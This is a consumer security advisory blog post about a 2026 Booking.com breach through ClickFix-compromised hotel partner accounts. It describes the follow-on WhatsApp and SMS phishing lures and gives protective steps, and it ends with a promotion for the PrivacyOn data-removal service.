On April 13, 2026, Booking.com confirmed that unauthorized third parties accessed guest reservation data after compromising hotel partner accounts using the ClickFix phishing technique. Over 4,000 customers had their data stolen, including credit card information for roughly 300 individuals. Scammers are already using the stolen data to launch targeted phishing campaigns through WhatsApp and SMS, referencing exact hotel names, check-in dates, and booking confirmation numbers. If you have used Booking.com recently, here is what you need to know and what to do next.
What Happened
The Booking.com breach did not involve a direct hack of Booking.com's own backend infrastructure. Instead, attackers targeted hotel partner accounts using a social engineering technique known as ClickFix. Hotel employees were tricked into installing malware disguised as a computer "fix" -- a fake prompt that appeared to resolve a technical issue but instead gave attackers access to the hotel's Booking.com partner portal.
Once inside the partner accounts, the attackers were able to view and extract guest reservation data. This is a supply chain attack in the truest sense: by compromising the weakest link in the chain (individual hotel staff), criminals gained access to sensitive customer data held within the Booking.com platform.
What Data Was Exposed
The breach exposed customer names, email addresses, phone numbers, and booking details including hotel names, check-in and check-out dates, and confirmation numbers. For approximately 300 customers, credit card data was also accessed. Booking.com stated that its core backend infrastructure was not breached and that financial or payment data was not accessed for the vast majority of affected users.
The Phishing Campaigns Have Already Started
What makes this breach particularly dangerous is how quickly and effectively the stolen data is being weaponized. Victims are reporting targeted phishing messages via WhatsApp and SMS that reference their exact booking details -- the specific hotel, the dates of their stay, and their confirmation number. These messages are designed to look like legitimate communications from Booking.com or the hotel itself.
Common phishing approaches being reported include:
- Fake payment verification requests: Messages claiming there is a problem with your payment and asking you to re-enter your credit card details through a link.
- Booking confirmation scams: Messages asking you to "confirm" your reservation by clicking a link that leads to a fake Booking.com login page.
- Cancellation threats: Urgent messages claiming your booking will be cancelled unless you verify your identity or payment information within a short timeframe.
- Refund scams: Messages offering a refund or compensation for the breach, directing you to a fraudulent website to "claim" the payment.
Because these messages contain real booking details that only Booking.com and the hotel should know, they are far more convincing than generic phishing attempts. Even cautious users may be caught off guard when a message references their exact hotel and travel dates.
Do Not Click Links in Messages About Your Booking
If you receive any message referencing a Booking.com reservation -- whether by email, SMS, or WhatsApp -- do not click any links. Instead, open the Booking.com app or website directly by typing the URL into your browser and log in to check for any legitimate notifications. Booking.com will never ask you to re-enter payment information through a text message or WhatsApp.
Steps to Take Right Now
1. Check if You Were Affected
Log in to your Booking.com account directly through the official website or app. Check for any notifications or messages from Booking.com regarding the breach. Review your recent bookings and look for any changes you did not make, such as altered reservation details or new bookings you do not recognize.
2. Change Your Booking.com Password
Even though Booking.com stated that login credentials were not part of the compromised data, changing your password is a sensible precaution. Use a strong, unique password that you do not use on any other site. Enable two-factor authentication on your Booking.com account if you have not already done so.
3. Monitor Your Credit Card Statements
If you have made bookings through Booking.com in the past year, review your credit card and bank statements carefully for any unauthorized charges. Pay particular attention to the cards you used for Booking.com reservations. If you notice suspicious activity, contact your card issuer immediately to dispute the charges and request a replacement card.
4. Be Extremely Cautious of Targeted Messages
For the foreseeable future, treat any unsolicited communication referencing a hotel booking with suspicion -- even if the details are accurate. Scammers now have enough information to craft highly convincing messages. Always verify directly through the Booking.com app or website rather than responding to or clicking links in messages.
5. Report Phishing Attempts
If you receive phishing messages that reference your Booking.com reservation data, report them to Booking.com through their official customer service channels. You can also report phishing to the FTC at ReportFraud.ftc.gov and forward phishing emails to the Anti-Phishing Working Group at reportphishing@apwg.org.
6. Consider a Credit Freeze
If your credit card data was among the approximately 300 accounts compromised, consider placing a credit freeze with all three major credit bureaus -- Equifax, Experian, and TransUnion. A credit freeze is free and prevents anyone from opening new credit accounts in your name.
Understanding the ClickFix Technique
The ClickFix attack method used in this breach is a growing threat that deserves wider awareness. It works by presenting victims -- in this case, hotel employees -- with fake error messages or system notifications. The victim is instructed to "fix" the problem by copying and pasting a command, clicking a button, or installing a supposed update. In reality, these actions install malware or execute malicious scripts that give attackers remote access to the system.
ClickFix attacks have surged throughout 2025 and 2026, and they are particularly effective because they exploit human trust in system prompts. Microsoft's 2025 Digital Defense Report identified ClickFix-style techniques in a significant percentage of observed initial compromises. The Booking.com breach demonstrates how a single hotel employee falling for this technique can cascade into a breach affecting thousands of customers.
The Broader Risk: Your Data on Broker Sites
The personal information exposed in this breach -- names, email addresses, phone numbers, and travel patterns -- is exactly the kind of data that data brokers collect and sell. Even before this breach, much of this information was likely already available on people-search websites. The breach simply adds another data point that criminals can cross-reference with existing profiles to build a more complete picture of you.
This is why proactive data removal matters. When your personal information is readily available on data broker sites, every new breach becomes more dangerous because criminals can combine the newly stolen data with what is already publicly accessible. PrivacyOn monitors over 100 data broker sites for your personal information and continuously submits removal requests on your behalf. With 24/7 monitoring and dark web surveillance, PrivacyOn helps reduce your overall exposure so that when breaches like this occur, there is less publicly available data for criminals to exploit alongside the stolen information.
The Booking.com breach is a reminder that your data security depends not only on the companies you do business with but also on how much personal information is freely available about you online. Taking control of your data broker presence is one of the most effective steps you can take to limit the damage from breaches that are increasingly impossible to avoid.